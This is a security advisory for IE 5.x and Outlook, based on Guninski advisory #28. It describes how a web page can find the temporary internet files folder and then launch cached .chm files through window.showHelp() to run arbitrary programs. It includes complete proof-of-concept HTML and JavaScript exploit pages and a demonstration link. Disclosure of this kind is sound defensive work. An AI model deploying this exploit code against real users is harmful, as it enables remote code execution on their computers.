COMMAND
IE
SYSTEMS AFFECTED
IE 5.x/Outlook
PROBLEM
Following is based on a Georgi Guninski security advisory #28.
IE 5.x/Outlook allows executing arbitrary programs using .chm
files and temporary internet files folder.
There is a security vulnerability in IE 5.5/Outlook/Outlook
Express which allows executing arbitratrary programs using .chm
files and revealing the location of temporary internet files
folder. This may lead to taking full control over user's
computer.
Georgi reported a similar vulnerability regarding .chm files
sometime ago and Microsoft fixed it by allowing .chm files to run
programs only if the .chm was loaded from the local file system.
But it is possible to find the temporary internet files folder -
there are several folders with random names.
The following HTML code:
<OBJECT DATA="http://SOMEHOST.COM/chmtemp.html" TYPE="text/html" WIDTH=200 HEIGHT=200>
where SOMEHOST.COM is a web server or alias that is different
from the web server from which the HTML page is loaded may reveal
one of the temporary internet files folders thru document.URL.
Once a temporary internet files folder name is known it is
possible to cache a .chm in any temporary internet files folder
and then use window.showHelp() to execute it.
There are other ways to execute programs once a temporary internet
files folder is known and document is cached in it but showHelp()
seems to be the simplest. If the demonstration does not work wait
a minute and reload the page or increase the number of "chm*.chm"
files in <IMG> and showHelp() or increase the time to wait if it
is insufficient to download the chm files.
The code is:
---------chmtempmain.html------------------------------------------
<IMG SRC="chm1.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm2.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm3.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm4.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm5.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm6.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm7.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm8.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm9.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm10.chm" WIDTH=1 HEIGHT=1>
<BR>
The object below must be loaded from a server with name different
from the parent document - it may be the same server but use the IP
address or another alias.
<BR>
If this does not work try increasing the number of "chm*.chm" in IMG
and showHelp.
<BR>
<OBJECT DATA="http://guninski.com/chmtemp.html" TYPE="text/html" WIDTH=200 HEIGHT=200>
---------------------------------------------------------------------
--------chtmtemp.html------------------------------------------------
<SCRIPT>
function g()
{
s=document.URL;
path=s.substr(0,s.lastIndexOf("\\"));
path=unescape(path);
alert("One of your temp files directory is: "+path);
window.showHelp(path+"\\chm1[1].chm");
window.showHelp(path+"\\chm2[1].chm");
window.showHelp(path+"\\chm3[1].chm");
window.showHelp(path+"\\chm4[1].chm");
window.showHelp(path+"\\chm5[1].chm");
window.showHelp(path+"\\chm6[1].chm");
window.showHelp(path+"\\chm7[1].chm");
window.showHelp(path+"\\chm8[1].chm");
window.showHelp(path+"\\chm9[1].chm");
window.showHelp(path+"\\chm10[1].chm");
}
setTimeout("g()",5000); // if you are on a slow internet connection you must increase the delay
</SCRIPT>
Demonstration is available at:
http://www.guninski.com/chmtempmain.html
SOLUTION
Disable Active Scripting.